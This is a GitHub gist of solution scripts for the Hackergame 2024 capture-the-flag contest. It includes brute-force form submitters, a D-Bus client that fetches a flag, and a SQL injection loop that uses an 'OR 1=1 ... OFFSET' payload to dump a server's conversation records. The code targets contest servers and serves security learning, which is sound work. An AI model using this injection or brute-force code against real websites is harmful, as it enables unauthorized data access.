Skip to content

Instantly share code, notes, and snippets.

@vifly
Last active November 12, 2024 12:03
Show Gist options
  • Save vifly/67e439ac69eff8c4c6ae94fe2ca92b15 to your computer and use it in GitHub Desktop.
Save vifly/67e439ac69eff8c4c6ae94fe2ca92b15 to your computer and use it in GitHub Desktop.
Hackergame 2024 writeup code
import requests
cookies = dict(
session="",
)
def crack(answer):
data = {
"q1": "3A204",
"q2": "2682",
"q3": "程序员的自我修养",
"q4": "336",
"q5": "6e90b6",
"q6": "",
}
data["q6"] = answer
r = requests.post("http://202.38.93.141:13030/", data=data, cookies=cookies)
if r.text.count("flag{") == 2:
print(r.text)
exit()
for i in range(1750, 1900):
print(i)
crack(str(i))
#define _GNU_SOURCE
#include <sys/mman.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <gio/gio.h>
int main() {
int sv[2];
socketpair(AF_UNIX, SOCK_STREAM, 0, sv);
write(sv[0], "Please give me flag2\n", 21);
GDBusConnection *connection;
GError *error = NULL;
// Connect to the session bus
connection = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &error);
if (error) {
g_printerr("Error connecting to session bus: %s\n", error->message);
g_clear_error(&error);
return 1;
}
GUnixFDList *fd_list = g_unix_fd_list_new();
gint fd_index = g_unix_fd_list_append(fd_list, sv[1], &error);
if (fd_index == -1) {
g_printerr("Error adding FD to GUnixFDList: %s\n", error->message);
g_clear_error(&error);
g_object_unref(fd_list);
return 1;
}
GVariant *parameters = g_variant_new("(h)", fd_index);
// Create a D-Bus message for method invocation
GDBusMessage *message = g_dbus_message_new_method_call(
"cn.edu.ustc.lug.hack.FlagService", // destination bus name
"/cn/edu/ustc/lug/hack/FlagService", // object path
"cn.edu.ustc.lug.hack.FlagService", // interface name
"GetFlag2" // method name
);
g_dbus_message_set_body(message, parameters);
g_dbus_message_set_unix_fd_list(message, fd_list);
// Send the message
GDBusMessage *response = g_dbus_connection_send_message_with_reply_sync(
connection, message, G_DBUS_SEND_MESSAGE_FLAGS_NONE,
-1, // timeout (use default)
NULL, NULL, &error);
if (response == NULL) {
g_printerr("Error sending message: %s\n", error->message);
g_clear_error(&error);
} else {
g_print("Message sent successfully, response received.\n");
// Get the response body and print it
GVariant *response_body = g_dbus_message_get_body(response);
if (response_body) {
gchar *response_str = g_variant_print(response_body, TRUE);
g_print("Response: %s\n", response_str);
g_free(response_str);
} else {
g_print("No response body.\n");
}
g_object_unref(response);
}
// Cleanup
g_object_unref(message);
g_object_unref(connection);
return 0;
}
import requests
import time
cookies = {
"session": "",
}
SESS = requests.session()
def crack():
questions = SESS.post("http://202.38.93.141:12122/game", cookies=cookies, json={})
print(questions.text)
questions_list = questions.json()["values"]
print(questions_list)
answers = []
for q in questions_list:
if q[0] < q[1]:
answers.append("<")
elif q[0] > q[1]:
answers.append(">")
time.sleep(9)
r = SESS.post("http://202.38.93.141:12122/submit", json={"inputs": answers})
print(r.json())
crack()
import requests
cookies = {
"session": ""
}
SESS = requests.session()
url = "https://<REPLACE_IT>.hack-challenge.lug.ustc.edu.cn:8443/view"
def crack():
index = 0
while True:
resp = SESS.get(
url,
params={
"conversation_id": f"114514' OR 1=1 ORDER BY id LIMIT 1 OFFSET {index}--"
},
cookies=cookies,
)
with open("./paolugpt.txt", "a") as f:
f.write(resp.text)
index = index + 1
if resp.status_code != 200:
break
crack()
#!/usr/bin/python3
import atexit, base64, flask, itertools, os, re
def crc(input: bytes) -> int:
poly, poly_degree = 'AaaaaaAaaaAAaaaaAAAAaaaAAAaAaAAAAaAAAaaAaaAaaAaaA', 48
assert len(poly) == poly_degree + 1 and poly[0] == poly[poly_degree] == 'A'
flip = sum(['a', 'A'].index(poly[i + 1]) << i for i in range(poly_degree))
digest = (1 << poly_degree) - 1
for b in input:
digest = digest ^ b
for _ in range(8):
digest = (digest >> 1) ^ (flip if digest & 1 == 1 else 0)
return digest ^ (1 << poly_degree) - 1
def hash(input: bytes) -> bytes:
digest = crc(input)
u2, u1, u0 = 0xCb4EcdfD0A9F, 0xa9dec1C1b7A3, 0x60c4B0aAB4Bf
assert (u2, u1, u0) == (223539323800223, 186774198532003, 106397893833919)
digest = (digest * (digest * u2 + u1) + u0) % (1 << 48)
return digest.to_bytes(48 // 8, 'little')
def xzrj(input: bytes) -> bytes:
pat, repl = rb'([B-DF-HJ-NP-TV-Z])\1*(E(?![A-Z]))?', rb'\1'
return re.sub(pat, repl, input, flags=re.IGNORECASE)
paths: list[bytes] = []
xzrj_bytes: bytes = bytes()
with open(__file__, 'rb') as f:
for row in f.read().splitlines():
row = (row.rstrip() + b' ' * 80)[:80]
path = base64.b85encode(hash(row)) + b'.txt'
with open(path, 'wb') as pf:
pf.write(row)
paths.append(path)
xzrj_bytes += xzrj(row) + b'\r\n'
def clean():
for path in paths:
try:
os.remove(path)
except FileNotFoundError:
pass
atexit.register(clean)
bp: flask.Blueprint = flask.Blueprint('answer_a', __name__)
@bp.get('/answer_a.py')
def get() -> flask.Response:
return flask.Response(xzrj_bytes, content_type='text/plain; charset=UTF-8')
@bp.post('/answer_a.py')
def post() -> flask.Response:
wrong_hints = {}
req_lines = flask.request.get_data().splitlines()
iter = enumerate(itertools.zip_longest(paths, req_lines), start=1)
for index, (path, req_row) in iter:
if path is None:
wrong_hints[index] = 'Too many lines for request data'
break
if req_row is None:
wrong_hints[index] = 'Too few lines for request data'
continue
req_row_hash = hash(req_row)
req_row_path = base64.b85encode(req_row_hash) + b'.txt'
if not os.path.exists(req_row_path):
wrong_hints[index] = f'Unmatched hash ({req_row_hash.hex()})'
continue
with open(req_row_path, 'rb') as pf:
row = pf.read()
if len(req_row) != len(row):
wrong_hints[index] = f'Unmatched length ({len(req_row)})'
continue
unmatched = [req_b for b, req_b in zip(row, req_row) if b != req_b]
if unmatched:
wrong_hints[index] = f'Unmatched data (0x{unmatched[-1]:02X})'
continue
if path != req_row_path:
wrong_hints[index] = f'Matched but in other lines'
continue
if wrong_hints:
return {'wrong_hints': wrong_hints}, 400
with open('answer_a.txt', 'rb') as af:
answer_flag = base64.b85decode(af.read()).decode()
closing, opening = answer_flag[-1:], answer_flag[:5]
assert closing == '}' and opening == 'flag{'
return {'answer_flag': answer_flag}, 200
input_file = "./answer_a.py"
new_content = []
with open(input_file, "r") as f:
for l in f:
l = l.strip("\n")
new_content.append(l + " " * (80 - len(l)) + "\n")
with open("original_answer_a.py", "w") as f:
f.writelines(new_content)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment